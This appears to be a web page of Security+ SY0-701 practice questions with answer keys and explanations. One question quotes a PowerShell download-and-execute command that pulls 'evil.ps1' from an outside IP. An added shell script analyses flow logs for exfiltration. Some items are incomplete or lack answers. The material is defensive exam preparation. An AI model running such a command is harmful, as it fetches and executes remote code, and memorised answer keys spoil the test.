Practice Free SY0-701 Exam Online Questions
An administrator installs an SSL certificate on a new system. During testing, errors indicate that the certificate is not trusted. The administrator has verified with the issuing CA and has validated the private key.
Which of the following should the administrator check for next?
- A . If the wildcard certificate is configured
- B . If the certificate signing request is valid
- C . If the root certificate is installed
- D . If the public key is configured
C
Explanation:
The correct answer is "If the root certificate is installed" because trust errors in SSL/TLS deployments most commonly occur when the certificate chain cannot be validated back to a trusted root certificate authority. In the Security+ SY0-701 cryptography and PKI objectives, trust is established through a chain of trust, beginning with a trusted root CA, followed by any intermediate CAs, and ending with the server’s certificate.
In this scenario, the administrator has already confirmed that the certificate was issued by a legitimate CA and that the private key is valid. This eliminates common issues related to key mismatch or improper issuance. The next logical step is to verify that the system (or the client systems connecting to it) trusts the CA that issued the certificate. If the root certificate, or a required intermediate certificate, is missing from the trust store, clients will flag the certificate as untrusted even though it is otherwise valid.
Option A, checking wildcard configuration, is not relevant unless the certificate is being used for multiple subdomains, which is not indicated.
Option B, validating the certificate signing request, would be unnecessary because the CA successfully issued the certificate.
Option D, verifying the public key, is incorrect because the public key is embedded in the certificate and would already be validated as part of successful issuance.
The SY0-701 study guide highlights that certificate trust failures are frequently caused by incomplete certificate chains, missing root or intermediate certificates, or misconfigured trust stores. Ensuring that the correct root CA certificate is installed allows systems to verify the certificate’s authenticity and establish secure communications.
In summary, when an SSL certificate is valid but not trusted, the most likely cause is a missing trusted root certificate, making option C the correct answer.
A security analyst receives an alert from a corporate endpoint used by employees to issue visitor badges. The alert contains the following details:
Which of the following best describes the indicator that triggered the alert?
- A . Blocked content
- B . Brute-force attack
- C . Concurrent session usage
- D . Account lockout
B
Explanation:
The activity described in the table, where multiple connection attempts are made on port 445 (used for SMB services), suggests a brute-force attack. The attacker likely used automated methods to guess credentials, causing multiple failures. Such attempts are a hallmark of brute-force attacks targeting shared resources.
Reference: CompTIA Security+ SY0-701 Study Guide, Domain 4: Security Operations, Section: "Indicators of Malicious Activity".
A company suffered a critical incident where 30GB of data was exfiltrated from the corporate network.
Which of the following actions is the most efficient way to identify where the system data was exfiltrated from and where it was sent?
- A . Analyze firewall and network logs for large amounts of outbound traffic to external IP addresses or domains.
- B . Analyze IPS and IDS logs to find the IP addresses used by the attacker for reconnaissance scans.
- C . Analyze endpoint and application logs to see whether file-sharing programs were running.
- D . Analyze external vulnerability scans to identify exploitable systems.
A
Explanation:
To efficiently identify where data was exfiltrated from and where it was sent, the best action is to analyze firewall and network logs for unusually large outbound data transfers. Security+ SY0-701 emphasizes that network-level telemetry provides the most direct evidence of data exfiltration, including source IPs, destination IPs or domains, ports, protocols, timestamps, and data volume.
Firewall and flow logs can quickly reveal which internal systems transmitted large quantities of data externally and identify the attacker’s destination infrastructure. This approach is efficient because it focuses directly on the movement of data rather than preliminary or secondary indicators.
IPS/IDS logs (B) are more useful for detecting reconnaissance or intrusion attempts, not confirming data theft paths. Endpoint and application logs (C) may help identify tools used but are less efficient for mapping data movement. External vulnerability scans (D) identify weaknesses, not exfiltration activity.
Therefore, the most efficient action is A: Analyze firewall and network logs for large outbound traffic.
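As an added example that is not part of the page: the aggregation a practitioner would run over firewall or flow logs to answer both halves of the question, which internal host the data left from and which external address it went to. The log lines are constructed, and RFC 1918 ranges are assumed to be the internal network.

```shell
#!/bin/sh
# Constructed flow log (not from the page). One connection per line:
# timestamp src_ip dst_ip dst_port proto action bytes_out
FLOW_LOG='2024-05-01T02:14:09Z 10.10.5.23 10.10.5.1 53 udp allow 180
2024-05-01T02:15:11Z 10.10.5.23 203.0.113.77 443 tcp allow 524288000
2024-05-01T02:16:30Z 10.10.7.8 198.51.100.10 443 tcp allow 4096
2024-05-01T02:18:02Z 10.10.7.8 192.168.20.4 445 tcp allow 52428800
2024-05-01T02:19:55Z 10.10.9.14 203.0.113.5 22 tcp deny 0
2024-05-01T02:20:17Z 10.10.9.14 198.51.100.10 443 tcp allow 2048
2024-05-01T02:22:40Z 10.10.5.23 203.0.113.77 443 tcp allow 838860800
2024-05-01T02:31:05Z 10.10.5.23 203.0.113.77 443 tcp allow 629145600'

# outbound_by_pair: total allowed bytes from each internal source to each
# external destination, largest first. Internal is assumed to mean RFC 1918.
# Internal-to-internal traffic and denied attempts are ignored, because only
# data that actually left the network matters for the exfiltration question.
outbound_by_pair() {
  printf '%s\n' "$FLOW_LOG" | awk '
    function internal(ip) {
      return ip ~ /^10\./ || ip ~ /^192\.168\./ || ip ~ /^172\.(1[6-9]|2[0-9]|3[01])\./
    }
    $6 == "allow" && internal($2) && !internal($3) { bytes[$2 " " $3] += $7 }
    END { for (k in bytes) printf "%s %d\n", k, bytes[k] }
  ' | sort -k3,3nr
}

# flag_exfil THRESHOLD_BYTES: the pairs worth investigating first. The first
# column is where the data was exfiltrated from, the second where it was sent.
flag_exfil() {
  outbound_by_pair | awk -v limit="$1" '$3 > limit'
}

flag_exfil 1000000000
```

Note that the three transfers from 10.10.5.23 are individually unremarkable for HTTPS; the source-to-destination total is what exposes the path.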
An alert references attacks associated with a zero-day exploit. An analyst places a bastion host in the network to reduce the risk.
Which type of control is being implemented?
- A . Compensating
- B . Detective
- C . Operational
- D . Physical
A
Explanation:
A bastion host is a hardened system placed at a network boundary to absorb attacks and limit exposure. When deployed to mitigate risks from zero-day vulnerabilities, it acts as a compensating control. CompTIA Security+ SY0-701 defines compensating controls as alternative safeguards used when primary controls are insufficient or unavailable―such as when no patch exists for a zero-day.
Detective controls (B) identify issues but do not reduce exposure. Operational controls (C) refer to procedural or human-driven processes. Physical controls (D) secure physical environments (e.g., locks, cameras).
Because a bastion host compensates for the lack of a patch, the correct answer is A: Compensating.
A security analyst reviews the following endpoint log:
powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://176.30.40.50/evil.ps1')"
Which of the following logs will help confirm an established connection to IP address 176.30.40.50?
- A . System event logs
- B . EDR logs
- C . Firewall logs
- D . Application logs
C
Explanation:
The best answer is C. Firewall logs.
The PowerShell command shown is suspicious because it uses:
- -exec bypass to bypass the PowerShell execution policy
- IEX (Invoke-Expression) to execute the downloaded content in memory
- Net.WebClient.DownloadString() to retrieve a remote script from the IP address 176.30.40.50
The question asks which logs will help confirm an established connection to that IP address. The best source for confirming that network communication actually occurred is firewall logs, because they record allowed and blocked inbound or outbound network connections between systems and remote IP addresses.
Why the other options are incorrect:
Which of the following considerations is the most important for an organization to evaluate as it establishes and maintains a data privacy program?
- A . Reporting structure for the data privacy officer
- B . Request process for data subject access
- C . Role as controller or processor
- D . Physical location of the company
C
Explanation:
The most important consideration when establishing a data privacy program is defining the organization’s role as a controller or processor. These roles, as outlined in privacy regulations such as the General Data Protection Regulation (GDPR), determine the responsibilities regarding the handling of personal data. A controller is responsible for determining the purpose and means of data processing, while a processor acts on behalf of the controller. This distinction is crucial for compliance with data privacy laws.
Reporting structure for the data privacy officer is important, but it is a secondary consideration compared to legal roles.
Request process for data subject access is essential for compliance but still depends on the organization’s role as controller or processor.
Physical location of the company can affect jurisdiction, but the role as controller or processor has a broader and more immediate impact.
Which of the following architectures is most suitable to provide redundancy for critical business processes?
- A . Network-enabled
- B . Server-side
- C . Cloud-native
- D . Multitenant
An organization is evaluating the cost of licensing a new solution to prevent ransomware.
Which of the following is the most helpful in making this decision?
- A . ALE
- B . SLE
- C . RTO
- D . ARO
A
Explanation:
ALE (Annualized Loss Expectancy) is the risk management metric most helpful when deciding whether the licensing cost of a ransomware prevention solution is justified.
ALE calculates the expected yearly financial loss from a particular threat. It is computed as:
ALE = SLE × ARO
SLE (Single Loss Expectancy) estimates the monetary impact of one ransomware incident.
ARO (Annualized Rate of Occurrence) estimates how often the incident is expected to happen each year.
By comparing ALE to the annual licensing cost of the new security solution, the organization can make a financially informed decision based on cost-benefit analysis. If ALE exceeds the solution’s cost, the purchase is justified.
RTO (C) relates to recovery time after outages, not cost justification. SLE (B) is only part of the calculation and insufficient alone. ARO (D) shows frequency but not financial impact.
Security+ SY0-701 highlights ALE as the primary metric for evaluating security investments.
Thus, ALE is the key factor in determining whether purchasing ransomware protection is financially beneficial.
An organization recently started hosting a new service that customers access through a web portal. A security engineer needs to add to the existing security devices a new solution to protect this new service.
Which of the following is the engineer most likely to deploy?
- A . Layer 4 firewall
- B . NGFW
- C . WAF
- D . UTM
C
Explanation:
The security engineer is likely to deploy a Web Application Firewall (WAF) to protect the new web portal service. A WAF specifically protects web applications by filtering, monitoring, and blocking HTTP requests based on a set of rules. This is crucial for preventing common attacks such as SQL injection, cross-site scripting (XSS), and other web-based attacks that could compromise the web service.
A Layer 4 firewall operates primarily at the transport layer, focusing on IP address and port filtering, which makes it unsuitable for web application-specific threats.
An NGFW (Next-Generation Firewall) provides more advanced filtering than traditional firewalls, including layer 7 inspection, but a WAF is tailored specifically for web traffic.
A UTM (Unified Threat Management) appliance offers a suite of security tools in one package (such as antivirus, firewall, and content filtering), but for web application-specific protection, a WAF is the best fit.
